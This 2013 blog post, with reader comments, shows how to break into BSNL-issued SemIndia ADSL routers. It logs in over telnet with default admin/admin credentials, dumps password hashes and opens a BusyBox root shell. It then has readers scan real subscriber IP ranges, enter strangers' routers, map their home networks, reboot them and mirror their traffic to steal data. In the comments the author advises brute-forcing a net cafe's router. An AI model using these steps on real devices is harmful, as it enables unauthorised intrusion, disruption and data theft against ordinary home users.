How to hack the bsnl router

By | April 15, 2013

BSNL now a days is providing a adsl router made by SemIndia Systems and the model names are similar to DNA-A201 or DNA-A211-1. In this article we are going to hack into this router to learn more about it.

You might not know that this small and innocent looking modem is actually a "Linux CPU". Lets get into it. First do a nmap scan of this modem. Here is a quick example

$ nmap 192.168.1.1

Starting Nmap 5.21 ( http://nmap.org ) at 2012-08-31 19:52 IST
Nmap scan report for 192.168.1.1
Host is up (0.052s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE
23/tcp   open  telnet
80/tcp   open  http
5431/tcp open  park-agent

Nmap done: 1 IP address (1 host up) scanned in 0.75 seconds

The http port is open and that is why we are able to access the administration page from http://192.168.1.1/
But apart from http the telnet port is also open. So why not try connecting to it.

$ telnet 192.168.1.1
Trying 192.168.1.1...
Connected to 192.168.1.1.
Escape character is '^]'.
SemIndia Systems ADSL Router
Login: admin
Password: 
>

Wow! we are able to login into the telnet daemon of our router using the default username/password of admin/admin.
What next... type in the help command and hit enter. It will list the supported commands somewhat like this

> help

?
help
logout
reboot
adsl
atm
brctl
cat
df
dumpcfg
echo
ifconfig
kill
arp
defaultgateway
dhcpserver
dns
lan
passwd
ppp
remoteaccess
restoredefault
route
save
swversion
wan
serialnum
lan6
dhcp6c
dns6
defaultgateway6
route6
ping
ps
pwd
sntp
sysinfo
tftp

>

Some of these are the common terminal commands on linux. ps, pwd, ping, cat etc. So lets see the current working directory using pwd.

> pwd
/
>

Listing directories

So we are in the root directory of the filesystem. The ls command is not available. So we have to use another trick to list the directories. And the trick is echo *

> echo *
bin dev etc images lib linuxrc mnt proc sbin usr var webs
>

Cool! Now those directories are found on any linux system like Ubuntu, Fedora etc.

/etc/passwd file

You might next want to see the password file /etc/passwd. The cat command is available and can be used for this.

> cat /etc/passwd
admin:7wfiFif6nh6VA:0:0:Administrator:/:/bin/sh
support:MVMCoQ0jGR4Yo:0:0:Technical Support:/:/bin/sh
user:MrYImHrIkIxRI:0:0:Normal User:/:/bin/sh
nobody:685CCPc3VWsbs:0:0:nobody for ftp:/:/bin/sh
>

Thats a linux password file.

Linux version

The uname command is not available so to get the linux kernel version and other details use the following command

> cat /proc/version
Linux version 2.6.8.1 ([email protected]) (gcc version 3.4.2) #1 Wed Dec 16 08:35:56 IST 2009
>

So that shows the linux kernel version and some extra details.

Better shell

The above shell can be improved by running the sh command.

> sh


BusyBox v1.00 (2009.12.16-03:08+0000) Built-in shell (msh)
Enter 'help' for a list of built-in commands.

#

So now we get a BusyBox shell. Once again we can type the help command to see what all is available.

# help

Built-in commands:
-------------------
        . : break cd continue eval exec exit export help login newgrp
        read readonly set shift times trap umask wait [ busybox cat chmod
        cp date dmesg echo expr false ftpget ifconfig init insmod kill
        killall klogd linuxrc ln logger logread mkdir mount msh ping
        ps pwd reboot rm rmmod route sendarp sh sleep sysinfo syslogd
        test tftp tftpd true tty umount vconfig

#

This time we have a few additional commands available, like cd, mkdir, date, eval, exec etc and even mount.
A list of all possible commands that Busybox can have is available here.

CPU/RAM Information

The details about CPU and architecture can be found out using the following command

# cat /proc/cpuinfo
system type             : 96338L-2M-8M
processor               : 0
cpu model               : BCM6338 V1.0
BogoMIPS                : 239.20
wait instruction        : no
microsecond timers      : yes
tlb_entries             : 32
extra interrupt vector  : yes
hardware watchpoint     : no
unaligned access                : 1289794
VCED exceptions         : not available
VCEI exceptions         : not available
#

Its an MIPS based 32bit processor. You can compile C programs for this platform using an mips compiler. Check http://developer.mips.com/tools/compilers/ for more information. Also check http://people.debian.org/~debacle/cross/.

RAM information

# cat /proc/meminfo
MemTotal:         5688 kB
MemFree:           424 kB
Buffers:           128 kB
Cached:           1004 kB
SwapCached:          0 kB
Active:           2016 kB
Inactive:          356 kB
HighTotal:           0 kB
HighFree:            0 kB
LowTotal:         5688 kB
LowFree:           424 kB
SwapTotal:           0 kB
SwapFree:            0 kB
Dirty:               0 kB
Writeback:           0 kB
Mapped:           1764 kB
Slab:             2284 kB
Committed_AS:     5172 kB
PageTables:        300 kB
VmallocTotal:  1048560 kB
VmallocUsed:       120 kB
VmallocChunk:  1048400 kB
#

So the device seems to have around 6MB of inbuilt memory.

There are many other files in the /proc directory that can be viewed to gather more information about the system.

# cd proc
# echo *
1 10 123 17 191 2 274 275 276 290 3 378 395 4 43 49 5 548 549 6 611 612 7 8 9 accumem buddyinfo bus cmdline cpuinfo devices diskstats driver execdomains filesystems free_pagewalk fs interrupts iomem ioports irq kcore kmsg loadavg locks meminfo misc modules mounts mtd net nvram pagewalk partitions self slabinfo stat sys sysvipc tty uptime var version vmstat
#

Try viewing other files and see what comes up.

Get Current username

The whoami command is not available to the echo command has to be used to find the current username, home directory etc.

# echo $USER
root
# echo $HOME
/
# echo $PATH
/bin:/sbin:/usr/bin
#

Writing files

The var directory is writable. And files have to be created using the echo command.

# echo "ABCDEFGHIJKLMNOPQRSTUVWXYZ" >> /var/happy.txt
# cat /var/happy.txt
ABCDEFGHIJKLMNOPQRSTUVWXYZ
#

Remote files can be downloaded onto the router as well. The ftpget command is available for this. The exact syntax can be found at http://www.busybox.net/downloads/BusyBox.html.

May be you would like to write and compile a C program and then upload it to this router.

Hacking remote routers

You can discover remote routers with a simple nmap command like this

$ sudo nmap --open -sS -sV -T4 117.194.233.1/24 -p 80 -oG - | grep 'open'
# Nmap 5.21 scan initiated Sat Sep  1 11:53:58 2012 as: nmap --open -sS -sV -T4 -p 80 -oG - 117.194.233.1/24 
Host: 117.194.233.4 ()  Ports: 80/open/tcp/////
Host: 117.194.233.12 () Ports: 80/open/tcp//http//micro_httpd/
Host: 117.194.233.35 () Ports: 80/open/tcp//http//D-Link DSL-502T http config/
Host: 117.194.233.40 () Ports: 80/open/tcp//skype2//Skype/
Host: 117.194.233.42 () Ports: 80/open/tcp//http//Embedded Allegro RomPager webserver 4.07 UPnP|1.0 (ZyXEL ZyWALL 2)/
Host: 117.194.233.57 () Ports: 80/open/tcp//http//thttpd/
Host: 117.194.233.61 () Ports: 80/open/tcp//tcpwrapped///
Host: 117.194.233.68 () Ports: 80/open/tcp//skype2//Skype/
Host: 117.194.233.72 () Ports: 80/open/tcp//http//micro_httpd/
Host: 117.194.233.77 () Ports: 80/open/tcp//tcpwrapped///
Host: 117.194.233.104 ()        Ports: 80/open/tcp//tcpwrapped///
Host: 117.194.233.106 ()        Ports: 80/open/tcp//skype2//Skype/
Host: 117.194.233.138 ()        Ports: 80/open/tcp//skype2//Skype/
Host: 117.194.233.141 ()        Ports: 80/open/tcp//skype2//Skype/
Host: 117.194.233.145 ()        Ports: 80/open/tcp//http//SonicWALL firewall http config/
Host: 117.194.233.150 ()        Ports: 80/open/tcp//http//micro_httpd/
Host: 117.194.233.158 ()        Ports: 80/open/tcp//http//micro_httpd/
Host: 117.194.233.160 ()        Ports: 80/open/tcp//http//Linksys wireless-G WAP http config (Name DSL-N10)/
Host: 117.194.233.217 ()        Ports: 80/open/tcp//skype2//Skype/
Host: 117.194.233.227 ()        Ports: 80/open/tcp//http//Apache httpd 2.2.19/

This command just scans all the Bsnl broadband ips to see which are alive and have a port 80 open. If its micro_httpd then its most likely a SemIndia router with BusyBox shell. The "Embedded Allegro RomPager" are Airtel Binatone and Beetel modems being used by Bsnl broadband users.

One way to irritate other users is to restart the remote router by issuing the reboot command in the telnet terminal. But that would not be much fun.

Hack into the LAN

The arp command can be used on the remote router to list its LAN nodes or all the computers in its internal network. Its quite simple

> arp show

IP address       HW type     Flags       HW address            Mask     Device
192.168.1.216    0x1         0x2         ##:##:##:##:##:##     *        br0
192.168.1.33     0x1         0x2         ##:##:##:##:##:##     *        br0

>

The HW/mac address has been hidden for privacy purpose. Now the router tells us who is inside the network.
Note that that arp command shall not be available in the sh shell. It will only be available in the telnet session.

Any of the internal nodes can be pinged

> ping 192.168.1.216
PING 192.168.1.216 (192.168.1.216): 56 data bytes
56 bytes from 192.168.1.216: icmp_seq=0 ttl=128 time=60.0 ms
56 bytes from 192.168.1.216: icmp_seq=1 ttl=128 time=80.0 ms
56 bytes from 192.168.1.216: icmp_seq=2 ttl=128 time=0.0 ms
56 bytes from 192.168.1.216: icmp_seq=3 ttl=128 time=30.0 ms

--- 192.168.1.216 ping statistics ---
4 packets transmitted, 4 packets received, 0% packet loss
round-trip min/avg/max = 0.0/42.5/80.0 ms
>

From here on it might be possible to do some advanced hacking. The insmod command is available that can be used to load kernel modules.

Hackers would like to make a remote router forward a copy of all network traffic to their own machine so that information can be stolen. The iptables command is available and can be used to do this.

Conclusion

It would be a good idea to protect your own router from such hack attempts from the internet. This can be done by disabling remote logins to telnet, http etc. Login into your configuration page and http://192.168.1.1 and find out how to do that.

This hacking technique is not only applicable to just Bsnl routers. Other isps like airtel are also using similar routers. So it might be possible to try the same thing on them as well. Just need to scan the ip range.

Rest is your creativity. Research and find out what else can be done on such routers.

About Silver Moon

A Tech Enthusiast, Blogger, Linux Fan and a Software Developer. Writes about Computer hardware, Linux and Open Source software and coding in Python, Php and Javascript. He can be reached at [email protected].

8 Comments

How to hack the bsnl router
  1. Akshat Tandon

    hello, thanks for tips above. I want some help from you. Actually I have a BSNL ADSL+wifi router manufactured by teracom (Type W2 V1.00) model no. TDSL300W2 which I was using when I had a broadband connection from BSNL. But now I am having having a broadband connection hosted by a private company in Kanpur,UP. I was trying to connect it to the broadband modem of BSNL but it never connected and says DHCP not enabled on diagnosis. Can you let me way that I can use that modem as a router for my new internet connection. I think the problem is that the ip in the modem is set default to one that of BSNL (192.168.1.1) but the ip of my service provider is different and the DSL light keep on blinking.

    Help me please!!!

    Thanks.

  2. raj

    what about windows xp and windows 7 happy to find it… bsnl router 192.168.1.1
    i want to hack router password of net cafe centre with already connected pc help me out…
    not to change just to know how this is done…

    1. Silver Moon Post author

      The net cafe manager has already setup a different password. Try brute forcing. Or run an exploit if possible.
      Or best, ask the net cafe owner for the password.

  3. runnin

    That’s all you can do ? Just DOS the users. Come on !! Try cracking the passwords for Admin and Support. Try busybox exploits which are publically known. I am just trying to help you get a better hang of this if you came this far.

Leave a Reply

Your email address will not be published. Required fields are marked *